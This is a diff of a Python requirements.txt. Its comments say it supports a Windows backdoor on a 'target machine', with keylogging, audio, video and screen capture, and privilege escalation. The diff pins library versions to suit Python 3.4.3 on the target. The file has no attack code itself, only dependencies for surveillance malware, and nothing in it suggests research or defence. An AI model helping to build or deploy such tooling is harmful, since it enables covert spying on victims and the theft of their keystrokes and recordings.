--- a/requirements.txt
+++ b/requirements.txt
@@ -1,41 +1,22 @@
-# Core Windows libraries for backdoor functionality
-pywin32==306
+# Requirements for TARGET MACHINE (Windows with Python 3.4.3)
 
-# Keylogger dependencies (Windows specific)
-pyHook==1.5.1
-pynput==1.7.6
+# Windows API access (required for privilege escalation and window detection)
+pywin32>=223
 
-# Audio recording dependencies
-PyAudio==0.2.11
+# Cross-platform keylogger (Python 3.4.3 compatible)
+pynput>=1.6.0,<1.7.0
 
-# Video and screen recording dependencies
-opencv-python==4.8.1.78
-Pillow==10.0.1
-pyautogui==0.9.54
+# Audio recording (Python 3.4.3 compatible) 
+PyAudio>=0.2.7,<0.3.0
 
-# Image processing and screenshots
-numpy==1.24.4
+# Video recording and screenshots (Python 3.4.3 compatible)
+opencv-python>=3.4.0,<4.0.0
+Pillow>=3.4.0,<6.0.0  
+PyAutoGUI>=0.9.30,<0.10.0
+numpy>=1.11.0,<1.17.0
 
-# Additional Windows-specific libraries
-WMI==1.5.1
+# System utilities (Python 3.4.3 compatible)
+psutil>=5.0.0,<6.0.0
 
-# HTTP/Web functionality (optional for enhanced features)
-requests==2.31.0
-
-# Encryption libraries (optional for secure communication)
-cryptography==41.0.7
-
-# System information gathering
-psutil==5.9.6
-
-# Network scanning capabilities (optional)
-python-nmap==0.7.1
-
-# File handling and compression
-zipfile36==0.1.3
-
-# JSON handling (built-in, but listed for clarity)
-# json - built-in module
-
-# Additional utility libraries
-colorama==0.4.6
+# Network requests (Python 3.4.3 compatible)
+requests>=2.18.0,<2.25.0
